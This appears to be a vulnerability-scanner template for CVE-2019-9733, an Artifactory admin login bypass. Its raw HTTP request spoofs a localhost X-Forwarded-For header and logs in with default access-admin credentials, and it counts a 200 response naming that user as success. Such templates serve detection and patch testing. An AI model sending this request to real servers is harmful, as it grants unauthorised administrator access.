id: CVE-2019-9733 info: name: Artifactory Access-Admin Login Bypass author: akshansh severity: critical tags: cve,cve2019,artifactory requests: - raw: - | POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1 Host: {{Hostname}} Content-Length: 60 Accept: application/json, text/plain, */* X-Requested-With: artUI serial: 58 X-Forwarded-For: 127.0.0.1 Request-Agent: artifactoryUI User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Content-Type: application/json Origin: http://{{Hostname}} Referer: http://{{Hostname}}/artifactory/webapp/ Accept-Language: en-US,en;q=0.9 Connection: close {"user":"access-admin","password":"password","type":"login"} matchers-condition: and matchers: - type: word words: - '"username": "access-admin"' part: body - type: status status: - 200